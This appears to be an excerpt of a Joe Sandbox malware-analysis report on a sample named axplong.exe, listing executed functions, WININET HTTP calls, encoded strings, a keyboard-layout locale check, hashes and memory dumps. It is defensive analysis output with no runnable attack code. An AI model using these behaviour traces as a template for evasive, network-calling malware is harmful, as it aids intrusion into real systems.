Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_file.jbxd

Similarity

API ID:
String ID: |"_O
API String ID: 0-3760475948
Opcode ID: ef0943a73957c1752709a4342832d311491d8058986ce1b41fe2cf5de7fa54ba
Instruction ID: 81c0bf44eb9d4a28c630a91a5aecb4493ecf7330169e9e92ed52fa159dbf1145
Opcode Fuzzy Hash: ef0943a73957c1752709a4342832d311491d8058986ce1b41fe2cf5de7fa54ba
Instruction Fuzzy Hash: E50145EF08C210BEA146C1956BAC9F66EAFE1C73707318427F403A1E42E2880B495131

Function 053A0198 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c5d6eb92079a5b21a9ed8381ef983f34dfc7bfae6bffbccfc172f2c8a986a5c
Instruction ID: 476ca6e6f5d75c4d5f90d7b4add347fbaf0f30cb23bad192ae7933d0d953ef5c
Opcode Fuzzy Hash: 0c5d6eb92079a5b21a9ed8381ef983f34dfc7bfae6bffbccfc172f2c8a986a5c
Instruction Fuzzy Hash: 930190DF54C2A05DA64BC6615EAC6F22F2EE5C72303354467F44397E52B14C1A4D9272

Function 053A0130 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 784d18cc4e1016c3245e5467474a4ccfce2cb8d5d466ec091d6a6e380a2008c6
Instruction ID: 3d8b66c678ec6a0a8e70dc716c583796809e81030656395e2c500a9a85a6ae27
Opcode Fuzzy Hash: 784d18cc4e1016c3245e5467474a4ccfce2cb8d5d466ec091d6a6e380a2008c6
Instruction Fuzzy Hash: C901DFEF08C220BEA146C1926AAC5F2BB6EF5C3230731442AF44390D42A7981B695132

Analysis Process: axplong.exePID: 2672, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.5%
Total number of Nodes:	541
Total number of Limit Nodes:	33

Executed Functions

Function 00B2BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00B78D70,00000000,00000000,00000000,00000000), ref: 00B2BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B2BE11
HttpOpenRequestA.WININET(?,00000000), ref: 00B2BE5B
HttpSendRequestA.WININET(?,00000000), ref: 00B2BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 00B2BFCC
InternetCloseHandle.WININET(?), ref: 00B2C0A7
InternetCloseHandle.WININET(?), ref: 00B2C0AF
InternetCloseHandle.WININET(?), ref: 00B2C0B7

Strings

8KG0fymoFx==, xrefs: 00B2C2EB, 00B2C543
RpKt, xrefs: 00B2D516
invalid stoi argument, xrefs: 00B2E404
stoi argument out of range, xrefs: 00B2E3FA
8KG0fCKZFzY=, xrefs: 00B2C385
RHYTYv==, xrefs: 00B2BE33

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 688256393-332458646
Opcode ID: f83b37a0e2a566443b33617ae690606b96b637eb5516c9929e6f410b31f9dad1
Instruction ID: 05a2d324782847ec7df2170936136c0f6f0af98f8cc13c0142282f71ba263c35
Opcode Fuzzy Hash: f83b37a0e2a566443b33617ae690606b96b637eb5516c9929e6f410b31f9dad1
Instruction Fuzzy Hash: AAB1E4B1A101289BEB24DF28DC85BEEBBE9EF45304F5041E9F50C97291DB719AC0CB95

Function 00B346C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00B37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00B3795C
Part of subcall function 00B37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00B37968
Part of subcall function 00B37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00B37971

Part of subcall function 00B2BD60: InternetOpenW.WININET(00B78D70,00000000,00000000,00000000,00000000), ref: 00B2BDED
Part of subcall function 00B2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B2BE11
Part of subcall function 00B2BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00B2BE5B

std::_Xinvalid_argument.LIBCPMT ref: 00B34EA2

Strings

246122658369, xrefs: 00B34F3A, 00B34F4D, 00B34F8F, 00B34F99, 00B354F4
6F9fr==, xrefs: 00B34712
MJB+, xrefs: 00B34776, 00B347ED, 00B34A95, 00B34B0C
8ZF6, xrefs: 00B35502
V0N6, xrefs: 00B3537A
aZT6, xrefs: 00B353CC
9KN6, xrefs: 00B35351
mP=, xrefs: 00B36383, 00B36652
WJP6, xrefs: 00B353A3
aqB6, xrefs: 00B354DB
9526, xrefs: 00B3531D
KFT0PL==, xrefs: 00B354B9
JB6, xrefs: 00B353F5
Vp 6, xrefs: 00B35447
MJF+, xrefs: 00B347BD, 00B348EC, 00B34ADC, 00B34C0B
5F6, xrefs: 00B35497
stoi argument out of range, xrefs: 00B34269, 00B34EAC
Fz==, xrefs: 00B3369E, 00B34D2D
96B6, xrefs: 00B35470
V0x6, xrefs: 00B3541E
fed3aa, xrefs: 00B35489

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 2414744145-1662704651
Opcode ID: 2c63b0b632914a5a1c6ba68679037ca666c41df161787af3b45a4348821f35b0
Instruction ID: d7b8f7be2d483ffab01a43aa52499cb38b26335aa2fc9211bf48ac12ad275c46
Opcode Fuzzy Hash: 2c63b0b632914a5a1c6ba68679037ca666c41df161787af3b45a4348821f35b0
Instruction Fuzzy Hash: A4234671E001589BEB29DB28CD8979DBBF69F95304F6481D8E008A72D2EB359F84CF51

Function 00B25DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 00B2603B
00000422, xrefs: 00B25FD9
00000423, xrefs: 00B2600A
00000419, xrefs: 00B25FA8
Keyboard Layout\Preload, xrefs: 00B25F64

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 7fc256c93887c9a523322485ab5da2d8f9dddb37adfdc5fa5b5e2713ae63af19
Instruction ID: 9ebc78b9300855c61951f7b742bfa235b006611e99152d19c1143e4beb2f29e7
Opcode Fuzzy Hash: 7fc256c93887c9a523322485ab5da2d8f9dddb37adfdc5fa5b5e2713ae63af19
Instruction Fuzzy Hash: 83E16F71900268ABEB24DF94CC89BDEB7B9EF14304F5042D9E509A7291DB74AFC48F91

Function 00B27D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B27EA3

Strings

JmpxQb==, xrefs: 00B281B2
JmpyPb==, xrefs: 00B2810A
JmpxRL==, xrefs: 00B28062

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 7c14d1ee2dc98400c41b6e3ab08300a734bb2c3765c13ff1ddcdd7f4186b6a0b
Instruction ID: 771af1e45271e58e93c3fd237056b8eb8c0ccb2fc6bdbdb87923a0fbfb1103a3
Opcode Fuzzy Hash: 7c14d1ee2dc98400c41b6e3ab08300a734bb2c3765c13ff1ddcdd7f4186b6a0b
Instruction Fuzzy Hash: 6BD1D870E01668D7DB24BB28EC4B3AD77E1AB45710F5442D8E419AB3D2DF358E818BD2

Function 00B56E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00B56E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00B56E7D
__dosmaperr.LIBCMT ref: 00B56F12

Part of subcall function 00B57177: __dosmaperr.LIBCMT ref: 00B571AC

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: f097fefc20154781fd85dff28f12c0350bfad8033a31c314c4d64e5fdb60693d
Instruction ID: 1737f4ba9fd53f61c6cf5424fecd0b1003009afe9b026873f7ec21c590e8d9d2
Opcode Fuzzy Hash: f097fefc20154781fd85dff28f12c0350bfad8033a31c314c4d64e5fdb60693d
Instruction Fuzzy Hash: A2416D75D00304AECB24EFB5E845AAFBBF9EF49301B1044ADF856D7210EA319808CB21

Function 00B282B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00B28454

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 25199b6e89032dfe23f93d9a6c9384f9b3f99eae8dfda5c32aa360057c2da24b
Instruction ID: e8ed1cdb30d6c29376f674faccbb0285a984d1567b50cc8aaaec83d2d917423a
Opcode Fuzzy Hash: 25199b6e89032dfe23f93d9a6c9384f9b3f99eae8dfda5c32aa360057c2da24b
Instruction Fuzzy Hash: 04511870D012289BEB24EB68ED897EDB7F5DB45310F5042D8E818A73D1EF359A80CB95

Function 00B56C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3a93cd6b033946dacc36d309f936c52a645f8559652b83c153fb79f392cd77
Instruction ID: b6f82432ecc804c468e66a9d200bf3e8d4964c995d4e3061caec5effccf18a32
Opcode Fuzzy Hash: 9c3a93cd6b033946dacc36d309f936c52a645f8559652b83c153fb79f392cd77
Instruction Fuzzy Hash: 2A21D872A052086AEB117B649C42B9F37A9DF4133AF6007E0FD342B2D1DBB05E0996A1

Function 00B56F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00B56FB3

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: ea4a06a9a084f8932c150a6707fb76c6bd0da1bdc514b61b66b3ec6444e6f59f
Instruction ID: 7fba958c43a97adb0df7939648e844f83aca88086af412be74330ecd27c4d5fc
Opcode Fuzzy Hash: ea4a06a9a084f8932c150a6707fb76c6bd0da1bdc514b61b66b3ec6444e6f59f
Instruction Fuzzy Hash: 2211DD7290020CAACB14DE95D984EDFB7FCAB08315F5052A6E911E7180EB31EB48CB61

Function 00B36AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00B36B65

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: cb4d7bcd69a68a2fb22edbf3edfef477d1f1604bb1ee22c824aa2dfda6b67045
Instruction ID: 0d59643a25fcc3443f44e016fdd57fe1e06ae5345aa0df7012a6a438cd23051a
Opcode Fuzzy Hash: cb4d7bcd69a68a2fb22edbf3edfef477d1f1604bb1ee22c824aa2dfda6b67045
Instruction Fuzzy Hash: 56F08171A40618ABC610BB699D07B1EBBE5AB06B60F900398E815672F1DB345A008BD2

Function 053C02CB Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bcbdae73ec87f119778b8fb6dbb8b8fbb42985f598cbf40fb8b84d1e7b57eea
Instruction ID: 361f90e3c999828bc9a08e66978fe3c9215f8e75a1698f720c44eb1cf8753e83
Opcode Fuzzy Hash: 0bcbdae73ec87f119778b8fb6dbb8b8fbb42985f598cbf40fb8b84d1e7b57eea
Instruction Fuzzy Hash: 79017CFB14C160FE7046C1C12B189FE6B6EE1D3230330C5ABF806C5842D2950E496332

Function 053C02CD Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b56c7148cd2243895765b9b59a4a1eddf40d1e5ce27da0ed1c6725f03fc098f
Instruction ID: cd45fb1155a48acc4862db58174d823ee928dd9169cd88f57225fd5ca696ec51
Opcode Fuzzy Hash: 8b56c7148cd2243895765b9b59a4a1eddf40d1e5ce27da0ed1c6725f03fc098f
Instruction Fuzzy Hash: 63017CFB14C160FE7046C1C12B189FE6B6EE1D2230330C5ABF806C5842D2940E496332

Function 053C02FF Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e6838fadc33ea80424de5a565506a876f4ca6b3be2af2447fa0b4b987fcb14c
Instruction ID: 4653a00c4878c783a08387b1b2b4d152519bf4ce2548e7ae21c9c791ef91a1db
Opcode Fuzzy Hash: 0e6838fadc33ea80424de5a565506a876f4ca6b3be2af2447fa0b4b987fcb14c
